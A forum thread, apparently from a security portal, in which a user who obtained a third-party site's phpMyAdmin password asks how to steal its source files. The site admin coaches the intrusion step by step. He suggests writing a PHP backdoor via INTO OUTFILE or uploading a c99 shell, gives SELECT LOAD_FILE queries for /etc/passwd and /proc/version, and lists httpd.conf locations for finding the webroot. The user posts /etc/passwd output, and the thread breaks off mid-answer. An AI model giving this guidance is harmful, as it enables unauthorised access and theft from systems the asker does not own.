Waraxe IT Security Portal

clubreseau · Advanced user

I Found a site to hack and...

I found the password to enter in is phpmyadmin, i got all is database information, and structure.

Now i want to know if it exist a way to grab all is php and html files ?

the version of phpmyadmin is phpMyAdmin 2.5.4
and the version of mysql is MySQL 4.1.11-Debian_4sarge8-log

thank for your help !

gibbocool · Advanced user

if you have FILE privelages then you can access files.

clubreseau · Advanced user

how with phpmyadmin i can browse files ?

waraxe · Site admin

If you have access to "mysql.user" table, then you have FILE privileges or you can delegate them to any other mysql user. And as gibbocool allready said, FILE privileges in mysql means ability to read and write files in database server. You can't "browse" files directly with phpmyadmin though Smile

Use "INTO OUTFILE" for writing php backdoor and then use php functions for browsing the filesystem. Or upload php shell (c99?) and make use of it.

clubreseau · Advanced user

ok i use any program to enter i use www.site.com/phpmyadmin

can you tell me if i need a progrma to browse files

waraxe · Site admin

clubreseau · Advanced user

my problem is the language im french Smile

ok i browse file in phpmyadmin no problem.

now what i have to do ?

thank

clubreseau · Advanced user

i try

LOAD DATA INFILE
and
SELECT * INTO OUTFILE

can you explain please how it work this

waraxe · Site admin

Try this in phpmyadmin:

go to "Run SQL query/queries on database", where you can enter arbitrary sql queries.

And execute this query:

SELECT LOAD_FILE('/etc/passwd')

Let me know about results Smile

clubreseau · Advanced user

wow i see

root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemo...

waraxe · Site admin

Now ... probably you can read the files you wanted (php and html files). But you need to know FULL PATH to any file you want to access. So you need to exploit some full path dislcosure or you can try to guess full path via trial/error. Look at "/etc/passwd" file - do you see there username, which can be associated with your target? If so, then you should see there home directory too.

clubreseau · Advanced user

SELECT LOAD_FILE('/etc/passwd')

i got this

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh

[ edited by waraxe - no sensitive private info ! ]

clubreseau · Advanced user

i dont know where is the directory to get is index page of this site.

i try

SELECT LOAD_FILE('index.php');
SELECT LOAD_FILE('../index.php');
SELECT LOAD_FILE('/var/www/index.php');

no one work

clubreseau · Advanced user

someone can give me some tips ? how to find the path dir of is files ?

waraxe · Site admin

You need to do some research about target.
Try this: SELECT LOAD_FILE('/proc/version')

Next question - is the target webserver Apache? Apache 2? 2.2?
From etc/passwd file target server seems to be dedicated webserver, not shared virtual hosting provider. So i suggest to search for "httpd.conf" file. From this Apache config file you can find out all about webroot(s) dirs.
Usually Apache config file is located in:

$APACHE_HOME/conf/httpd.conf

So if you can get this environment variable, then you probably will find httpd.conf file too.
Some possible locations:

/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
usr/local/apache2.2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/etc/apache/httpd.conf

More ideas:

http://wiki.apache.org/httpd/DistrosDefaultLayout

There is one more solution - full path disclosure security issues.
Try to provoke (php) error messages in target.
If you can see something like: